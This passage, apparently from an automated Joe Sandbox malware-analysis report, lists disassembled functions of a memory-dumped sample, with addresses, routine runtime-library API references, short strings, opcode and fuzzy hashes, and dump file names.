                              • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                              • Instruction Fuzzy Hash: 3C819F31D04258DFCF15DFA8DA90ADDB7B5AF18318F24405AE416B7B90DB30AE89CB60
                              Function 6C8928E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
                              Download Yara Rule
                              APIs
                              • ___std_exception_destroy.LIBVCRUNTIME ref: 6C892A76
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ___std_exception_destroy
                              • String ID: Jbx$Jbx
                              • API String ID: 4194217158-1161259238
                              • Opcode ID: c0a7de62ad48f198049ca835d005a9671e95e315abe83ef8463467ecb8464ca1
                              • Instruction ID: aaf2a7e78d4eeb545a9f1a9053f4e4672689b97da67d9e1a2b5c43005f385b33
                              • Opcode Fuzzy Hash: c0a7de62ad48f198049ca835d005a9671e95e315abe83ef8463467ecb8464ca1
                              • Instruction Fuzzy Hash: C45125B2A002048FCB20CF5CD984ADEBBF5EF99314F15896DE8499B741D335E985CB92
                              Function 6CA465B2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: CK$CK
                              • API String ID: 3519838083-2096518401
                              • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                              • Instruction ID: a78a762890db92c9f8abfd9bc5f44e8c1cadb0907eb51904565310110f2940c9
                              • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                              • Instruction Fuzzy Hash: E7516E75A003059FDB04CFA4C9C4BEEB3B5FF88359F188529D901EBB41DB75A9898B60
                              Function 6C9DD46E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C9E4C46), ref: 6C9DD58B
                              • __dosmaperr.LIBCMT ref: 6C9DD592
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ErrorLast__dosmaperr
                              • String ID: 8Q
                              • API String ID: 1659562826-4022487301
                              • Opcode ID: 67360e0b52e71c42bcc4fabd560ced24e7c3949e12c49d4c6293d537fbd4c25a
                              • Instruction ID: ca0cd7f22d03a9a2d1530a692b7f0d7337e56c337f815f81b9d027c97fd40b4a
                              • Opcode Fuzzy Hash: 67360e0b52e71c42bcc4fabd560ced24e7c3949e12c49d4c6293d537fbd4c25a
                              • Instruction Fuzzy Hash: E2419972614945AFDB118F6CC880AA97FF8EB4630CF15C298E890AB746D330FD118FA0
                              Function 6CA34C24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 0|J$`)L
                              • API String ID: 3519838083-117937767
                              • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction ID: 9f4f2682d4a131d2476bc3f50201b41c7741a119c23fa7a3f929c81485f44514
                              • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction Fuzzy Hash: 0241B531605755EFCB128F64C4A07EEBFE2FF55248F04442EE06A97B50CB72A989CB51
                              Function 6CA30906 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$LuJ
                              • API String ID: 3519838083-205571748
                              • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction ID: bf4d914893da3c0ea9b1baa91e1338c70536f2023654d2cc8766398fdaf38991
                              • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction Fuzzy Hash: A001C0B2E01349DADB10DFE984905AEF7B4FF59358F40942EE069E3A40C3345988CB99
                              Function 6C9DE298 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44memoryCOMMON
                              Download Yara Rule
                              APIs
                              • _free.LIBCMT ref: 6C9DE2B9
                              • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C9DABAA,?,00000004,?,4B42FCB6,?,?,6C9CFCFC,4B42FCB6,?), ref: 6C9DE2F5
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: AllocHeap_free
                              • String ID: 8Q
                              • API String ID: 1080816511-4022487301
                              • Opcode ID: 770281587fd542272e4945b5e094a004edc3d5193cf568dd120940d64eca6c9a
                              • Instruction ID: 2f5905a68c28ac9a6bbbdf8eec03bcbb606527515d53bc36a00a1914f0f12aba
                              • Opcode Fuzzy Hash: 770281587fd542272e4945b5e094a004edc3d5193cf568dd120940d64eca6c9a
                              • Instruction Fuzzy Hash: 99F0FC31A4199566DB215E26EC00B8BB76C9FE3BB8B13C125FB15B6E80DB30F40146E1
                              Function 6CA5C5D5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: p/K$J
                              • API String ID: 3519838083-2069324279
                              • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                              • Instruction ID: 33b992c7c35be0c49cfb7ce0c3b2743424f940fcbae780938efb47348e915b54
                              • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                              • Instruction Fuzzy Hash: CF01BCB2A117119FD724CF59D6043AAB7F8EF55729F10C81E9052A3B80C7F8A5488BA4
                              Function 6CA3AFC7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA3AFCC
                                • Part of subcall function 6CA3A4D1: __EH_prolog.LIBCMT ref: 6CA3A4D6
                                • Part of subcall function 6CA3914B: __EH_prolog.LIBCMT ref: 6CA39150
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: J$0J
                              • API String ID: 3519838083-2882003284
                              • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                              • Instruction ID: 5b5d1b820dd7b3df870d12daf9118b5c6d207c29864f2d4d586f4133726c65e1
                              • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                              • Instruction Fuzzy Hash: 800105B1804B51CFC325CF65C5A428AFBF0BB15304F90C95EC0AA57B50D7B8A548CB68
                              Function 6CA54E19 Relevance: 5.2, Strings: 4, Instructions: 161COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: D)K$H)K$P)K$T)K
                              • API String ID: 0-2262112463
                              • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                              • Instruction ID: 970a4e69f41a8e543ca08959340e2992bed86e34f75034b1f4bf9f4c362dd0a7
                              • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                              • Instruction Fuzzy Hash: DA51D331904249AFCF01CF98D840BDEB7B1AF2531CF64841AE82267A91DB76D9BDCB50
                              Function 6CA74F20 Relevance: 5.0, Strings: 4, Instructions: 27COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: (?K$8?K$H?K$CK
                              • API String ID: 0-3450752836
                              • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                              • Instruction ID: 6f92d36400599ade425d20aae9da8c755e8ef32715455fd66aa525b1a6909149
                              • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                              • Instruction Fuzzy Hash: F9F01DB16117009FC3608F05D54869BB7F4EB41749F50C91EE09A9BA40D3B8A54C8FA8